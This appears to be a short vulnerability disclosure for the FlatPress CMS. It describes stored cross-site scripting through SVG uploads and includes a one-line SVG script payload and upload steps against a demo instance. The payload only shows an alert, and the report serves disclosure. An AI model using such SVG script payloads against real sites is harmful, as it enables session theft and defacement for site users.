Description
flatpresshas a feature to upload file “uploader” and display from “media manager”. By uploading SVG files, the users can perform Stored XSS attack.
Copy the following code and save as filename.svg.
Proof of Concept
<x:script xmlns:x="http://www.w3.org/1999/xhtml">alert(document.domain)</x:script>
- login to http://demos4.softaculous.com/FlatPresseidiiohclz/admin.php?p=uploader&action=default
- go to uploader and upload this svg file
- go to the media manager and click on the svg file or open from the direct link:
http://demos4.softaculous.com/FlatPresseidiiohclz/admin.php?p=uploader&action=mediamanager
http://demos4.softaculous.com/FlatPresseidiiohclz/fp-content/attachs/filename.svg
- XSS!
if you need more specific information, feel free to contact me.